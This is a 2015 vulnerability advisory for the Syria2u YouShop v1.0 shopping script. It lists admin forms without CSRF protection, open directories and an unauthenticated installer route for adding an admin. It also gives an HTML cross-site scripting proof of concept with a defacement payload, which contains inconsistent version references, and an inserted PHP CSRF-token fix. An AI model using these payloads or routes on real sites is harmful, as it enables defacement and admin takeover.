Syria2u You Shop version 1.0 suffers from cross-site request forgery and cross-site scripting vulnerabilities.
5a9a82af6ecdffc5eb56418866b2a37da0a5fd26a7b6aea4fb6b74e69a16d68e
| # Title : Syria2u You Shop v1.0 Multiple Vulnerabilities
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : سكربت يوشــوب للتسوق عبر الانترنت , قم باختيار المدينة ثم تمتع بالتسوق في مدينتك من أي مكان
| # Tested on: win8.1 Fr V.(Pro) 15:39 * 23/05/2015
| # Bug : Multi
| # Download : http://www.syria2u.com/
=======================================
HTML forms without CSRF protection:
http://127.0.0.1/YouShop/Admin/system/addImage.php
http://127.0.0.1/YouShop/Admin/system/addVideo.php
http://127.0.0.1/YouShop/Admin/system/cckAddEdit.php
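The three admin handlers above accept state-changing POSTs with nothing tying the request to a session, which is what makes them forgeable from an attacker-controlled page. The following is an added example of the synchronizer-token pattern in PHP, the application's language; it is not YouShop's code, and the function names, the hidden field name csrf_token and the form fields are assumptions, not the project's identifiers.

```php
<?php
// Added example (not YouShop's code): synchronizer-token CSRF protection for an
// admin form handler such as Admin/system/addImage.php. Function names and the
// form field name "csrf_token" are assumptions, not the project's identifiers.
declare(strict_types=1);

session_start();

// One token per session; it is only generated when none exists, so several
// open admin tabs keep working with the same token.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison of the submitted token against the session token.
// A missing, non-string or wrong token fails closed.
function csrf_check(array $post): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    return $expected !== ''
        && is_string($given)
        && hash_equals($expected, $given);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Reject before any upload or database work happens.
    if (!csrf_check($_POST)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    // ... the handler's original processing (file upload, DB insert) goes here ...
}
?>
<!-- The token travels in a hidden field. A cross-origin attacker page can make
     the victim's browser submit this form, but it cannot read the token value
     to include it, so the forged request fails the check above. -->
<form method="post" enctype="multipart/form-data">
    <input type="hidden" name="csrf_token"
           value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
    <input type="file" name="image">
    <button type="submit">Add image</button>
</form>
```

The same csrf_check() call belongs at the top of every state-changing admin handler, not only addImage.php; marking the session cookie SameSite=Lax is a useful second layer but does not replace the token, since it depends on browser support and on the attacker not being same-site.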
Directory listing:
http://127.0.0.1/YouShop/admin/editor/
http://127.0.0.1/YouShop/files/
http://127.0.0.1/YouShop/admin/cck/
http://127.0.0.1/YouShop/admin/system/
XSS - jQuery v1.8.0 exploit:
<html>
<head>
  <meta charset="utf-8">
  <title>XSS - jQuery v1.8.0 </title>
  <script src="http://127.0.0.1/YouShop/admin/js/jquery-1.8.0.min.js"></script>
  <script>
  // The first option's text is handed to .after(), which treats a string
  // argument as HTML, so any markup in that text is rendered rather than shown.
  $(function() {
    $('#users').each(function() {
      var select = $(this);
      var option = select.children('option').first();
      select.after(option.text());
      select.hide();
    });
  });
  </script>
</head>
<body>
  <form method="post">
    <p>
      <select id="users" name="users">
        <option value="xssreflected"><script><marquee><font color=lime size=32>Hacked by indoushka</font></marquee>
reflected - jQuery v1.11.1 by - indoushka thnx to
@firebitsbr - mauro.risonho@gmail.com');</script></option>
      </select>
    </p>
  </form>
</body>
</html>
Add Admin:
http://127.0.0.1/YouShop/install/index.php?install=3
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz:
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friends:
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
---------------------------------------------------------------------------------------------------------------